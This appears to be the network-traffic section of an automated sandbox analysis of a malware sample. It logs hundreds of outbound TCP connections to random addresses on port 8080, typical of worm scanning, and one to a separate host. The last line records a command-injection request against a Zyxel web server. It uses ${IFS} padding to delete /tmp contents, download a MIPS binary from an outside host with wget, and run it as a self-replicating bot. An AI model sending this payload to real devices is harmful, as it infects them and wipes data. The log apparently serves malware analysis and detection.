Source: global trafficTCP traffic: 192.168.2.14:22741 -> 70.121.146.97:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.101.222.186:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 70.162.5.131:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 173.159.41.255:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 148.229.187.231:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 219.137.177.133:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 103.39.53.179:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.128.124.8:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 124.234.136.78:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 164.21.183.242:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 120.139.198.72:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 93.99.0.152:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 161.121.108.33:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 148.98.170.83:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 222.105.124.90:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.24.94.205:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 117.16.171.62:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 137.15.29.98:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 189.232.105.33:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 119.80.184.64:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 102.192.250.215:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 48.238.46.232:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 18.20.207.151:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 35.140.119.56:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 105.226.41.144:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 17.247.204.219:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 151.85.126.108:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.27.137.76:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 193.1.219.29:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 175.78.65.226:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 65.2.30.137:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 75.65.19.17:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.191.127.202:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.30.222.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 156.186.20.217:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 37.187.57.8:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 180.96.84.154:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 207.32.33.74:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 165.230.53.210:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 150.22.236.60:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.59.26.125:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 153.201.251.56:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 141.171.215.30:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 86.114.147.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 54.209.29.47:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 130.108.212.169:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 97.252.62.72:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 110.167.199.38:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 194.247.13.185:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 59.198.195.29:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 147.191.255.142:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 77.128.177.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 4.49.21.102:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 212.204.224.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 150.109.82.24:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 41.126.164.143:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 137.51.24.52:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 98.128.6.198:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 167.82.100.253:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 159.88.186.166:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 212.243.25.203:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.117.138.110:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 60.168.229.16:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 180.100.111.11:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 199.221.70.17:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 87.242.211.244:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 156.175.247.6:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 111.141.158.162:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 150.119.4.255:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 83.139.132.196:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 67.161.235.249:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 183.99.144.183:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 76.168.212.72:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 195.192.193.94:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.167.33.208:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.31.58.25:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 124.145.191.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 71.233.195.241:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 25.157.31.11:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 162.75.142.62:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 46.164.247.80:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.59.199.100:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 134.157.236.60:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 68.25.159.206:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 90.139.216.114:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 137.149.202.95:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 110.205.161.50:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 209.144.98.140:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 209.118.183.79:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 60.91.91.92:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 115.143.143.39:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 90.124.146.211:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 79.45.204.93:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 50.23.134.197:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 79.7.12.5:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 90.118.16.10:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 75.215.187.200:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 107.30.241.190:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 185.27.252.137:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 44.139.137.35:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 140.217.134.1:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 94.86.121.147:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 118.129.228.189:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 136.190.47.106:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 98.233.110.108:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 85.8.208.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 181.148.75.123:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 120.219.227.13:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 5.215.146.254:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.18.230.251:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 19.46.126.182:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 157.241.126.200:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 151.117.165.6:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 135.196.219.62:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 147.125.28.52:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 74.9.239.184:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 77.222.14.242:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 136.97.53.183:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 166.188.243.28:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 2.106.238.243:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 13.204.31.181:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 88.80.36.129:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 104.104.107.188:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 130.114.1.202:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 82.184.242.39:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 161.16.162.173:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 100.56.48.50:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 157.230.242.69:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 146.195.43.67:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 173.136.186.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 216.142.37.40:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 175.36.43.189:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 62.195.21.13:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 17.42.127.223:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 183.119.113.99:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 116.126.129.213:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 184.120.204.15:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 115.122.49.101:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 79.129.33.173:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 93.138.232.22:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 128.83.133.87:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 164.67.229.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 190.194.83.58:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 61.240.109.101:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 103.230.151.122:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 39.9.122.232:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 89.6.196.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 195.167.250.40:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 77.81.221.127:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 18.80.240.176:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 73.164.68.73:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 175.49.238.227:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 64.168.118.196:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 143.133.55.66:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 219.180.248.122:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 84.30.149.97:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.145.249.237:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 50.108.184.91:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 90.231.66.228:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.167.45.77:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.117.184.220:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 206.186.95.117:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 9.168.55.178:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 168.159.15.21:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 115.204.162.70:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.45.164.196:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 123.190.225.15:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 171.81.12.191:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 97.251.183.99:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 101.240.119.127:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 170.49.116.70:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.22.195.30:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 128.18.204.0:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 173.24.97.238:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 49.190.206.117:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 154.91.132.124:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 194.30.95.222:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 121.154.209.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 35.98.128.214:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 108.124.88.48:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 187.84.255.188:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 190.79.93.183:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 198.32.42.21:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 54.34.133.131:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 195.151.121.48:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 69.242.254.35:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 190.182.122.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 53.55.79.223:8080
Source: global trafficTCP traffic: 192.168.2.14:46666 -> 45.154.3.56:56789
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 197.40.214.116:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 122.79.214.230:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 156.7.216.57:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 77.89.197.154:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 81.141.52.7:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 39.234.182.72:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 170.180.27.221:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 187.170.2.32:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 80.92.115.162:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 176.151.200.169:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.121.60.125:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.253.240.69:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 93.108.36.139:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 13.31.45.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 210.247.133.178:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.115.67.86:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 143.202.85.235:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 125.21.181.139:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 106.84.154.174:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 189.32.255.235:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 162.184.167.111:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 168.117.183.220:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 216.59.143.214:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 199.97.3.209:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 223.187.184.120:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 206.29.189.219:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 181.2.172.36:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 174.100.68.55:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 207.46.194.41:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 34.119.39.208:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 96.105.8.170:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 151.58.233.24:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 141.50.132.36:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 193.149.95.236:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.240.52.102:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 182.99.245.150:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 168.20.90.186:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 84.146.213.202:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 84.68.236.250:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 204.176.96.236:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 73.163.94.223:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 149.121.5.68:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.173.60.130:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 161.91.119.46:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 135.135.163.226:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.45.191.209:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 66.45.84.13:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 74.79.5.112:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 173.228.139.76:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 65.247.251.89:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 71.133.96.151:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 109.27.62.255:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 182.72.199.53:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 111.184.247.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.152.147.23:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 211.34.155.241:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 13.172.55.142:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 159.96.216.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 144.147.153.65:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.125.108.64:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 154.97.175.21:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 191.141.145.51:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 186.100.198.108:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 113.0.248.254:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 154.64.124.5:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 155.14.236.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 43.79.123.3:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 69.40.151.242:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 78.28.14.14:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 97.226.255.126:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 46.177.26.179:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 23.88.59.148:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 38.87.142.195:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 73.239.99.113:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 103.240.36.209:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 211.214.47.219:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 160.203.83.49:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.10.141.88:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 179.4.157.247:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 195.66.81.242:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 72.228.136.106:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 195.2.11.215:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 36.4.1.75:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 42.46.146.151:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 193.124.136.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 9.16.15.112:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 150.145.192.23:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 65.152.79.64:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.39.120.102:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 53.244.6.76:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 9.166.193.178:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 202.247.239.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 32.90.19.87:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 134.53.150.43:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 157.172.78.207:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 84.106.70.166:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 211.154.246.24:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 138.26.192.83:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 194.216.112.249:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 113.60.223.49:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 32.157.35.128:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 168.144.237.44:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 2.126.191.157:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 98.84.11.197:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 81.39.15.248:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 213.65.152.185:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 161.237.138.237:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 129.20.28.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 209.73.24.226:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 216.62.48.253:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 109.7.96.116:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 98.34.112.79:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 1.82.53.29:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 185.47.17.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 63.136.118.126:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 96.254.209.218:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 151.205.35.229:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.99.100.183:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 31.32.244.197:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 62.47.39.143:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 213.202.141.97:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 63.96.185.147:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.93.113.11:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 46.226.21.151:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.55.100.240:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.218.163.98:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 163.219.192.59:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.14.251.83:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 50.74.30.223:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 39.161.214.134:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 160.230.154.44:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.176.107.95:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 122.162.25.106:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 154.16.237.100:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.102.9.147:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 211.91.210.86:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 197.153.181.3:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.172.141.182:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 136.223.175.91:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 48.85.74.208:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 70.47.48.217:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 177.255.231.51:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 187.68.14.234:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 191.140.16.210:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 171.233.106.105:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 97.38.58.54:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 197.220.91.198:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 153.22.152.119:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 159.25.239.215:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 177.75.17.186:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 36.30.84.29:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 59.228.8.78:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 102.35.23.212:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 60.142.3.162:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 133.123.63.154:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 70.42.249.45:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.111.150.55:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 133.31.209.86:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 190.236.68.11:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 184.64.139.20:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 40.31.200.200:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 90.154.195.93:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 205.121.47.134:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 27.220.229.213:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 162.117.50.77:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 128.120.208.168:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 184.228.214.81:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 13.19.8.20:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 44.73.68.87:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.58.90.128:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 103.236.146.52:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 189.191.12.152:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 32.129.203.172:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 146.178.156.138:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 106.171.96.138:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 95.172.107.112:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 54.213.55.148:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 61.219.227.23:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 201.44.166.129:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 57.155.207.162:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 18.56.124.16:8080
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
